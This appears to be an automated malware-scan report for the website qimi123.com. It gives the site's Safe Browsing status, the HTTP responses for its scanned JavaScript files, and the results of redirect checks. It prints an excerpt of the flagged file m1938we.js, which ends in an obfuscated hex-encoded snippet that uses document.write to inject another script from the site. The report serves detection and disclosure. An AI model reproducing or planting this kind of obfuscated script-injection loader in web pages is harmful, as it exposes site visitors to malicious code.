Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=qimi123.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://qimi123.com/ | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 03:32:25 GMT Accept-Ranges: bytes ETag: "f0a7f939b737d01:b9d" Server: Microsoft-IIS/6.0 Content-Length: 106780 Content-Location: http://qimi123.com/index.html Content-Type: text/html Last-Modified: Sat, 24 Jan 2015 09:22:08 GMT X-Powered-By: ASP.NET | clean |
http://qimi123.com/index.html | 200 OK Content-Length: 106780 Content-Type: text/html | clean |
http://qimi123.com/js/jquery.js | 200 OK Content-Length: 50667 Content-Type: application/x-javascript | clean |
http://qimi123.com/js/function.js | 200 OK Content-Length: 16566 Content-Type: application/x-javascript | clean |
http://qimi123.com/m1938/nousertop.js | 200 OK Content-Length: 184 Content-Type: application/x-javascript | clean |
http://qimi123.com/webdata/temp/banner/index-980x90.js | 200 OK Content-Length: 543 Content-Type: application/x-javascript | clean |
http://qimi123.com/m1938/VIP.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://qimi123.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://qimi123.com/m1938/m1938we.js | 200 OK Content-Length: 10352 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function $TAB(x){return document.getElementById(x);}
function tab_show(a,b,c,d){ x=a,max_i=b,tn=c,tc=d; for(var i=1;i<=max_i;i++){ if($TAB(tn+i))$TAB(tn+i).className=$TAB(tc+i).className=""; } $TAB(tn+x).className=$TAB(tc+x).className="on"; } function switchTab(identify,index,count,cnon,cnout) { try{ for(i=0;i<count;i++) { var CurTabObj = document.getElementById("Tab_"+identify+"_"+i) ; var CurListObj = document.get top: windowHeight/2-popupHeight/2, opacity: "show" }, "slow"); } function closeDiv(){ $("#mask").remove(); $("#popDiv").animate({left: 0, top: 0, opacity: "hide" }, "slow"); } var _0x623a=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x2F\x6D\x31\x39\x33\x38\x2F\x6D\x31\x39\x33\x38\x77\x65\x61\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x623a[1]](_0x623a[0]); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: qimi123.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 03:32:25 GMT
Accept-Ranges: bytes
ETag: "f0a7f939b737d01:b9d"
Server: Microsoft-IIS/6.0
Content-Length: 106780
Content-Location: http://qimi123.com/index.html
Content-Type: text/html
Last-Modified: Sat, 24 Jan 2015 09:22:08 GMT
X-Powered-By: ASP.NET
...106780 bytes of data.
GET / HTTP/1.1
Host: qimi123.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 03:32:25 GMT
Accept-Ranges: bytes
ETag: "f0a7f939b737d01:b9d"
Server: Microsoft-IIS/6.0
Content-Length: 106780
Content-Location: http://qimi123.com/index.html
Content-Type: text/html
Last-Modified: Sat, 24 Jan 2015 09:22:08 GMT
X-Powered-By: ASP.NET
...106780 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: qimi123.com
Referer: http://www.google.com/search?q=qimi123.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: qimi123.com
Referer: http://www.google.com/search?q=qimi123.com
Result:
The result is similar to the first query. There are no suspicious redirects found.